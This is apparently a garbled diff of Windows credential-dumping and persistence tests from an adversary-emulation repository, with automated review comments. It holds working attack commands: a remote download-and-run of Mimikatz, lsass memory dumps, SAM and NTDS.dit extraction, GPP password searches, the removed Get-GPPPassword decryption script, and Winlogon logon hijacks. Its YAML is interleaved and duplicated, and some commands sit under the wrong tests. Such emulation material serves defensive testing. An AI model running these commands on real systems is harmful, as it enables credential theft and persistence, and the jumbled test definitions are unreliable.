supported_platforms:
- windows
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: Path
default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
executor:
name: powershell
elevation_required: true
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
dependency_executor_name: powershell
dependencies:
- description: |
Windows Credential Editor must exist on disk at specified location (#{gsecdump_exe})
prereq_command: |
if (Test-Path #{gsecdump_exe}) {0} else {1}
get_prereq_command: |
Write-Host Automated installer not implemented yet
- name: Gsecdump
description: |
https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
executor:
name: command_prompt
elevation_required: true
command: |
#{gsecdump_exe} -a
supported_platforms:
- windows
- name: Windows Credential Editor
description: |
Dump credentials from memory using Windows Credential Editor from https://www.ampliasecurity.com/research/windows-credentials-editor/
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
gsecdump -a
input_arguments:
output_file:
description: Path where resulting data should be placed
type: Path
default: "%temp%\\output.txt"
wce_exe:
description: Path of Windows Credential Editor executable
type: Path
default: PathToAtomicsFolder\T1003\bin\wce.exe
wce_url:
description: Path to download Windows Credential Editor zip file
type: url
default: https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip
wce_zip_hash:
description: File hash of the Windows Credential Editor zip file
type: String
default: 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933
- name: Windows Credential Editor
description: |
http://www.ampliasecurity.com/research/windows-credentials-editor/
dependency_executor_name: powershell
dependencies:
- description: |
Windows Credential Editor must exist on disk at specified location (#{wce_exe})
prereq_command: |
if (Test-Path #{wce_exe}) {0} else {1}
get_prereq_command: |
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
Remove-Item $zippath, $parentpath\wce -Recurse
}
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
#{wce_exe} -o #{output_file}
input_arguments:
output_file:
description: Path where resulting data should be placed
type: Path
default: output.txt
- name: Registry dump of SAM, creds, and secrets
description: |
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
wce -o #{output_file}
executor:
name: command_prompt
elevation_required: true
command: |
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
cleanup_command: |
rm %temp%\sam
rm %temp%\system
rm %temp%\security
- name: Registry dump of SAM, creds, and secrets
description: |
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated
via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
- name: Dump LSASS.exe Memory using ProcDump
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
supported_platforms:
- windows
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: Path
default: PathToAtomicsFolder\T1003\bin\procdump.exe
input_arguments:
output_folder:
description: Output folder path
type: Path
default: C:\Windows\Temp
executor:
name: command_prompt
elevation_required: true
command: |
reg save HKLM\sam "#{output_folder}\sam"
reg save HKLM\system "#{output_folder}\system"
reg save HKLM\security "#{output_folder}\security"
cleanup_command: |
rm "#{output_folder}\sam"
rm "#{output_folder}\system"
rm "#{output_folder}\security"
dependency_executor_name: powershell
dependencies:
- description: |
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
prereq_command: |
if (Test-Path #{procdump_exe}) {0} else {1}
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
- name: Dump LSASS.exe Memory using ProcDump
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
executor:
elevation_required: true
name: command_prompt
command: |
procdump.exe -accepteula -ma lsass.exe #{output_file}
supported_platforms:
- windows
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
executor:
name: manual
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
input_arguments:
procdump_binary_path:
description: Path of the ProcDump binary
type: string
default: $PathToAtomicsFolder\T1003\bin\procdump64.exe
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\lsass_dump.dmp
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
executor:
elevation_required: true
name: command_prompt
command: |
#{procdump_binary_path} -accepteula -ma lsass.exe #{output_file}
cleanup_command: |
rm "#{output_file}"
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
- name: Dump LSASS.exe Memory using Windows Task Manager
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
- name: Offline Credential Theft With Mimikatz
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
supported_platforms:
- windows
input_arguments:
input_file:
description: Path where resulting dump should be placed
type: Path
default: lsass_dump.dmp
executor:
name: manual
steps: |
1. Open Mimikatz:
Execute `mimikatz` at a command prompt.
supported_platforms:
- windows
2. Select a Memory Dump:
Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
executor:
name: manual
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
3. Obtain Credentials:
Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
- name: Dump Active Directory Database with NTDSUtil
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
supported_platforms:
- windows
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
input_arguments:
output_folder:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp
- name: Offline Credential Theft With Mimikatz
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
dependencies:
- description: |
Target must be a Domain Controller
prereq_command: |
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
get_prereq_command: |
echo Sorry, Promoting this machine to a Domain Controller must be done manually
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
input_arguments:
mimikatz_binary_path:
description: Path of the Mimikatz binary
type: string
default: $PathToAtomicsFolder\T1003\bin\mimikatz.exe
input_file:
description: Path of the Lsass dump
type: Path
default: C:\Windows\Temp\lsass_dump.dmp
- name: Create Volume Shadow Copy with NTDS.dit
description: |
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
#{mimikatz_binary_path} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
default: "C:"
- name: Dump Active Directory Database with NTDSUtil
description: |
The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability
uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of
subsequent domain controllers without the need of network-based replication.
dependencies:
- description: |
Target must be a Domain Controller
prereq_command: |
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
get_prereq_command: |
echo Sorry, Promoting this machine to a Domain Controller must be done manually
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
vssadmin.exe create shadow /for=#{drive_letter}
input_arguments:
output_folder:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp
- name: Copy NTDS.dit from Volume Shadow Copy
description: |
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
executor:
name: command_prompt
elevation_required: true
command: |
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
supported_platforms:
- windows
- name: Create Volume Shadow Copy with NTDS.dit
description: |
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
input_arguments:
vsc_name:
description: Name of Volume Shadow Copy
type: String
default: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
extract_path:
description: Path for extracted NTDS.dit
type: Path
default: C:\Windows\Temp
supported_platforms:
- windows
dependencies:
- description: |
Target must be a Domain Controller
prereq_command: |
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
get_prereq_command: |
echo Sorry, Promoting this machine to a Domain Controller must be done manually
- description: |
Volume shadow copy must exist
prereq_command: |
if not exist #{vsc_name} (exit /b 1)
get_prereq_command: |
echo Run "Invoke-AtomicTest T1003 -TestName 'Create Volume Shadow Copy with NTDS.dit'" to fulfuill this requirement
- description: |
Extract path must exist
prereq_command: |
if not exist #{extract_path} (exit /b 1)
get_prereq_command: |
mkdir #{extract_path}
input_arguments:
drive_letter:
description: Drive letter to source VSC (including colon)
type: String
default: "C:"
executor:
name: command_prompt
elevation_required: true
command: |
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
cleanup_command: |
rm "#{extract_path}\ntds.dit"
rm "#{extract_path}\VSC_SYSTEM_HIVE"
rm "#{extract_path}\SYSTEM_HIVE"
executor:
name: command_prompt
elevation_required: true
command: |
vssadmin.exe create shadow /for=#{drive_letter}
- name: GPP Passwords (findstr)
description: |
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux.
- name: Copy NTDS.dit from Volume Shadow Copy
description: |
The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy.
supported_platforms:
- windows
This test requires steps taken in the test "Create Volume Shadow Copy with NTDS.dit".
A successful test also requires the export of the SYSTEM Registry hive.
This test must be executed on a Windows Domain Controller.
dependency_executor_name: powershell
dependencies:
- description: |
Computer must be domain joined
prereq_command: |
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
get_prereq_command: |
Write-Host Joining this computer to a domain must be done manually
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: false
command: |
findstr /S cpassword %logonserver%\sysvol\*.xml
input_arguments:
vsc_name:
description: Name of Volume Shadow Copy
type: String
default: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
extract_path:
description: Path for extracted NTDS.dit
type: Path
default: C:\Windows\Temp
- name: GPP Passwords (Get-GPPPassword)
description: |
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.
executor:
name: command_prompt
elevation_required: true
command: |
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
cleanup_command: |
rm "#{extract_path}\ntds.dit"
rm "#{extract_path}\VSC_SYSTEM_HIVE"
rm "#{extract_path}\SYSTEM_HIVE"
supported_platforms:
- windows
- name: GPP Passwords (findstr)
description: |
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux.
input_arguments:
gpp_script_path:
description: Path to the Get-GPPPassword PowerShell Script
type: Path
default: PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1
gpp_script_url:
description: URL of the Get-GPPPassword PowerShell Script
type: url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}
prereq_command: |
if(Test-Path "#{gpp_script_path}") { 0 } else { 1 }
get_prereq_command: |
New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null
Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}"
- description: |
Computer must be domain joined
prereq_command: |
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
get_prereq_command: |
Write-Host Joining this computer to a domain must be done manually
executor:
name: command_prompt
elevation_required: false
command: |
findstr /S cpassword %logonserver%\sysvol\*.xml
executor:
name: powershell
elevation_required: false
command: |
. #{gpp_script_path}
Get-GPPPassword -Verbose
- name: GPP Passwords (Get-GPPPassword)
description: |
Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller.
- name: Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script
description: |
This test uses PowerShell to copy SAM, SECURITY and SYSTEM files from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1)
supported_platforms:
- windows
supported_platforms:
- windows
input_arguments:
gpp_script_path:
description: Path to the Get-GPPPassword PowerShell Script
type: Path
default: $PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1
input_arguments:
ninjacopy_script_path:
description: Path to the Invoke-NinjaCopy PowerShell script
type: Path
default: PathToAtomicsFolder\T1003\src\Invoke-NinjaCopy.ps1
ninjacopy_script_url:
description: URL of the Invoke-NinjaCopy PowerShell Script
type: url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/6b0ada999a9d2be8c6c9267da57b898494d13219/Exfiltration/Invoke-NinjaCopy.ps1
output_folder:
description: Output folder path
type: Path
default: C:\Windows\Temp
executor:
name: powershell
elevation_required: false
command: |
. #{gpp_script_path}
Get-GPPPassword -Verbose
dependency_executor_name: powershell
dependencies:
- description: |
Invoke-NinjaCopy PowerShell Script must exist at #{ninjacopy_script_path}
prereq_command: |
if(Test-Path "#{ninjacopy_script_path}") { 0 } else { 1 }
get_prereq_command: |
New-Item -ItemType Directory (Split-Path "#{ninjacopy_script_path}") -Force | Out-Null
Invoke-WebRequest #{ninjacopy_script_url} -OutFile "#{ninjacopy_script_path}"
- name: Dump SAM, SECURITY and SYSTEM files using NinjaCopy PowerShell script
description: |
This test uses PowerShell to copy SAM, SECURITY and SYSTEM files from an NTFS partitioned volume by reading the raw volume and parsing the NTFS structures.
Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1)
supported_platforms:
- windows
input_arguments:
sam_binary_path:
description: Path of the SAM file
type: string
default: C:\Windows\System32\config\sam
system_binary_path:
description: Path of the SYSTEM file
type: string
default: C:\Windows\System32\config\system
security_binary_path:
description: Path of the SECURITY file
type: string
default: C:\Windows\System32\config\security
output_folder:
description: Output folder path
type: Path
default: C:\Windows\Temp
executor:
name: powershell
elevation_required: true
command: |
. $PathToAtomicsFolder\T1003\src\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "#{sam_binary_path}" -LocalDestination "#{output_folder}\sam"
Invoke-NinjaCopy -Path "#{system_binary_path}" -LocalDestination "#{output_folder}\system"
Invoke-NinjaCopy -Path "#{security_binary_path}" -LocalDestination "#{output_folder}\security"
cleanup_command: |
rm "#{output_folder}\sam"
rm "#{output_folder}\system"
rm "#{output_folder}\security"
executor:
name: powershell
elevation_required: true
command: |
. #{ninjacopy_script_path}
Invoke-NinjaCopy -Path "%systemroot%\System32\sam" -LocalDestination "#{output_folder}\sam"
Invoke-NinjaCopy -Path "%systemroot%\System32\system" -LocalDestination "#{output_folder}\system"
Invoke-NinjaCopy -Path "%systemroot%\System32\security" -LocalDestination "#{output_folder}\security"
cleanup_command: |
rm "#{output_folder}\sam"
rm "#{output_folder}\system"
rm "#{output_folder}\security"
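Review bot: the cleanup_command blocks that sit under `name: command_prompt` use `rm` (`rm "#{output_folder}\sam"`, `rm "#{extract_path}\ntds.dit"`, `rm "#{output_file}"`), which cmd.exe does not have, so the saved hives, the copied NTDS.dit and the lsass dump stay on disk after the test; use `del` there or move those executors to powershell. In the new dependency blocks: the Gsecdump dependency description reads "Windows Credential Editor must exist on disk at specified location (#{gsecdump_exe})", a copy-paste from the WCE test; "fulfuill" in the shadow-copy get_prereq_command; and only the WCE dependency checks what it downloads (`Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}`), while the ProcDump zip from download.sysinternals.com and the Get-GPPPassword and Invoke-NinjaCopy scripts are fetched with a plain `Invoke-WebRequest` and then run elevated, so a hash input plus the same verify helper would be consistent. The WCE block also does nothing visible when the hash check fails; an else branch that reports the mismatch would surface a bad download as a failed prereq instead of a later missing-file error.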
-248
@@ -1,248 +0,0 @@
function Get-GPPPassword {
<#
.SYNOPSIS
Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
PowerSploit Function: Get-GPPPassword
Author: Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords.
.PARAMETER Server
Specify the domain controller to search for.
Default's to the users current domain
.EXAMPLE
PS C:\> Get-GPPPassword
NewName : [BLANK]
Changed : {2014-02-21 05:28:53}
Passwords : {password12}
UserNames : {test1}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\DataSources\DataSources.xml
NewName : {mspresenters}
Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
Passwords : {Recycling*3ftw!, password123, password1234}
UserNames : {Administrator (built-in), DummyAccount, dummy2}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
NewName : [BLANK]
Changed : {2014-02-21 05:29:53, 2014-02-21 05:29:52}
Passwords : {password, password1234$}
UserNames : {administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\ScheduledTasks\ScheduledTasks.xml
NewName : [BLANK]
Changed : {2014-02-21 05:30:14, 2014-02-21 05:30:36}
Passwords : {password, read123}
UserNames : {DEMO\Administrator, admin}
File : \\DEMO.LAB\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Services\Services.xml
.EXAMPLE
PS C:\> Get-GPPPassword -Server EXAMPLE.COM
NewName : [BLANK]
Changed : {2014-02-21 05:28:53}
Passwords : {password12}
UserNames : {test1}
File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB982DA}\MACHINE\Preferences\DataSources\DataSources.xml
NewName : {mspresenters}
Changed : {2013-07-02 05:43:21, 2014-02-21 03:33:07, 2014-02-21 03:33:48}
Passwords : {Recycling*3ftw!, password123, password1234}
UserNames : {Administrator (built-in), DummyAccount, dummy2}
File : \\EXAMPLE.COM\SYSVOL\demo.lab\Policies\{31B2F340-016D-11D2-945F-00C04FB9AB12}\MACHINE\Preferences\Groups\Groups.xml
.EXAMPLE
PS C:\> Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq
password
password12
password123
password1234
password1234$
read123
Recycling*3ftw!
.LINK
http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1
http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html
#>
[CmdletBinding()]
Param (
[ValidateNotNullOrEmpty()]
[String]
$Server = $Env:USERDNSDOMAIN
)
#Some XML issues between versions
Set-StrictMode -Version 2
#define helper function that decodes and decrypts password
function Get-DecryptedCpassword {
[CmdletBinding()]
Param (
[string] $Cpassword
)
try {
#Append appropriate padding based on string length
$Mod = ($Cpassword.length % 4)
switch ($Mod) {
'1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
'2' {$Cpassword += ('=' * (4 - $Mod))}
'3' {$Cpassword += ('=' * (4 - $Mod))}
}
$Base64Decoded = [Convert]::FromBase64String($Cpassword)
#Create a new AES .NET Crypto Object
$AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
[Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
#Set IV to all nulls to prevent dynamic generation of IV value
$AesIV = New-Object Byte[]($AesObject.IV.Length)
$AesObject.IV = $AesIV
$AesObject.Key = $AesKey
$DecryptorObject = $AesObject.CreateDecryptor()
[Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
}
catch {Write-Error $Error[0]}
}
#define helper function to parse fields from xml files
function Get-GPPInnerFields {
[CmdletBinding()]
Param (
$File
)
try {
$Filename = Split-Path $File -Leaf
[xml] $Xml = Get-Content ($File)
#declare empty arrays
$Cpassword = @()
$UserName = @()
$NewName = @()
$Changed = @()
$Password = @()
#check for password field
if ($Xml.innerxml -like "*cpassword*"){
Write-Verbose "Potential password in $File"
switch ($Filename) {
'Groups.xml' {
$Cpassword += , $Xml | Select-Xml "/Groups/User/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/Groups/User/Properties/@userName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$NewName += , $Xml | Select-Xml "/Groups/User/Properties/@newName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/Groups/User/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
'Services.xml' {
$Cpassword += , $Xml | Select-Xml "/NTServices/NTService/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/NTServices/NTService/Properties/@accountName" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/NTServices/NTService/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
'Scheduledtasks.xml' {
$Cpassword += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/ScheduledTasks/Task/Properties/@runAs" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/ScheduledTasks/Task/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
'DataSources.xml' {
$Cpassword += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/DataSources/DataSource/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/DataSources/DataSource/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
'Printers.xml' {
$Cpassword += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/Printers/SharedPrinter/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/Printers/SharedPrinter/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
'Drives.xml' {
$Cpassword += , $Xml | Select-Xml "/Drives/Drive/Properties/@cpassword" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$UserName += , $Xml | Select-Xml "/Drives/Drive/Properties/@username" | Select-Object -Expand Node | ForEach-Object {$_.Value}
$Changed += , $Xml | Select-Xml "/Drives/Drive/@changed" | Select-Object -Expand Node | ForEach-Object {$_.Value}
}
}
}
foreach ($Pass in $Cpassword) {
Write-Verbose "Decrypting $Pass"
$DecryptedPassword = Get-DecryptedCpassword $Pass
Write-Verbose "Decrypted a password of $DecryptedPassword"
#append any new passwords to array
$Password += , $DecryptedPassword
}
#put [BLANK] in variables
if (!($Password)) {$Password = '[BLANK]'}
if (!($UserName)) {$UserName = '[BLANK]'}
if (!($Changed)) {$Changed = '[BLANK]'}
if (!($NewName)) {$NewName = '[BLANK]'}
#Create custom object to output results
$ObjectProperties = @{'Passwords' = $Password;
'UserNames' = $UserName;
'Changed' = $Changed;
'NewName' = $NewName;
'File' = $File}
$ResultsObject = New-Object -TypeName PSObject -Property $ObjectProperties
Write-Verbose "The password is between {} and may be more than one value."
if ($ResultsObject) {Return $ResultsObject}
}
catch {Write-Error $Error[0]}
}
try {
#ensure that machine is domain joined and script is running as a domain account
if ( ( ((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN ) ) {
throw 'Machine is not a domain member or User is not a member of the domain.'
}
#discover potential files containing passwords ; not complaining in case of denied access to a directory
Write-Verbose "Searching \\$Server\SYSVOL. This could take a while."
$XMlFiles = Get-ChildItem -Path "\\$Server\SYSVOL" -Recurse -ErrorAction SilentlyContinue -Include *.xml
if ( -not $XMlFiles ) {throw 'No preference files found.'}
Write-Verbose "Found $($XMLFiles | Measure-Object | Select-Object -ExpandProperty Count) files that could contain passwords."
foreach ($File in $XMLFiles) {
$Result = (Get-GppInnerFields $File.Fullname)
Write-Output $Result
}
}
catch { Write-Error $_ }
}
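Review bot: removing the vendored Get-GPPPassword.ps1 means the "GPP Passwords (Get-GPPPassword)" test now needs outbound HTTPS to raw.githubusercontent.com the first time it runs (the `gpp_script_url` dependency in T1003.yaml), which changes behaviour on lab hosts without internet access; if that is intended, say so in the test description. The replacement download is pinned to commit 87630cac639f29c2adcb163f661f02890adf4bdd but not hash-checked, so a hash input like `wce_zip_hash` would keep the same guarantee the in-repo copy gave.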
File diff suppressed because one or more lines are too long
+18 -6
@@ -27,18 +27,22 @@ PowerShell code to set Winlogon shell key to execute a binary at logon along wit
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
```
<br/>
<br/>
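Review bot: `Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force` leaves the modified Winlogon Shell value in HKCU after the test, and the rendered section has no "Cleanup Commands:" block the way the T1006 NinjaCopy page further down does; add a cleanup_command in the T1004 yaml that restores or removes the `Shell` value so the regenerated markdown carries it.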
@@ -48,18 +52,22 @@ PowerShell code to set Winlogon userinit key to execute a binary at logon along
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
```
<br/>
<br/>
@@ -69,12 +77,13 @@ PowerShell code to set Winlogon Notify key to execute a notification package DLL
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll|
